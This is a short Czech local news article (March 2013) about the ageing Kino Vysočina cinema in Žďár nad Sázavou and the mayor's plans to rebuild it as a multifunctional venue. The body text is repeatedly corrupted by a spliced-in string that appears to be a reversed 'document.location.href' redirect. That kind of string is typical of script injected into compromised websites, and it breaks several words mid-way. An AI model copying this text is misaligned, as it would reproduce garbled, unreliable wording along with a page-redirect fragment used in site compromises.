Žďár nad Sázavou, zdar nad sazavou, aktuality, kino
Rainbow page separator

Ve Žďáře uvažují, co dál s kinem

Středa, 6. března 2013

Žďár nad Sázavou / Už půl s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí bude le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v srpnu žďárské veřejnosti sloužit Kino Vysočina.Ačkoliv před dvěma lety bylo s podporou státní dotace za 4,5 milionu korun digitalizováno, stav samotného objektu je nevyhovující. Například zastaralý a finančně velice nákladný systém jeho vytápění.

„Nemůžeme nechat kino v takovém stavu a rok od roku platit větší ztrátu,“ uvedla žďárská starostka Dagmar Zvěřinová s tím, že je třeba začít uvažovat o generální přestavbě kina.

Objekt by potřeboval zateplit a celkově vnitřní pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory zmodernizovat, což ale nelze provádět za běžného provozu zařízení.

Vedení města se rovněž hodlá zamyslet nad tím, jak výhledově maximálně využít všechny pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory budovy. „Myslím si, že by se objekt měl vyřešit ne jenom jako mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, kde se promítají filmy, ale jako multifunkční zařízení. Mohla by tam například rovněž být nějaká větší zasedací místnost pro schůze spolků, anebo třeba přednáškový sál,“ poznamenala starostka Dagmar Zvěřinová.